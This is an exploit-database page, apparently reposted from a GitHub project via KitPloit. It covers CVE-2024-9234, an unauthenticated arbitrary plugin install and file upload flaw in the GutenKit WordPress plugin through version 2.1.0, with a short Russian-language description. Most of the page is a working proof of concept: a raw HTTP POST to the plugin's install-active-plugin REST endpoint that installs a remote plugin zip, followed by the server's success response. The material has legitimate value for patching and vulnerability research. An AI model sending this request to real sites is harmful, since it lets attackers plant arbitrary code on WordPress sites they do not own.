Sploitus

Exploit for CVE-2024-9234

kitploit · 2026-08-25

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RANDOMROBBIEBF-CVE-2024-9234
# CVE-2024-9234

GutenKit <= 2.1.0 - Неавторизованная произвольная загрузка файлов

# Описание

Плагин GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки прав доступа в функции install_and_activate_plugin_from_external() (конечная точка REST API install-active-plugin) во всех версиях до 2.1.0 включительно. Это позволяет неавторизованным атакующим устанавливать и активировать произвольные плагины или использовать эту функциональность для загрузки произвольных файлов, маскирующихся под плагины.

root@kitploit:~
    
    
    Type: plugin
    CVSS Score: 9.8
    CVE: CVE-2024-9234
    Slug: gutenkit-blocks-addon
    

Ссылка для скачивания: Download gutenkit-blocks-addon Version 2.1.0

## POC

root@kitploit:~
    
    
    POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
    Host: wpscan-vulnerability-test-bench.ddev.site
    Content-Type: application/json
    Content-Length: 114
    
    {
      "plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
      "slug": "popularis-extra"
    }
    

root@kitploit:~
    
    
    {"success":true,"data":"Plugin installed successfully!"}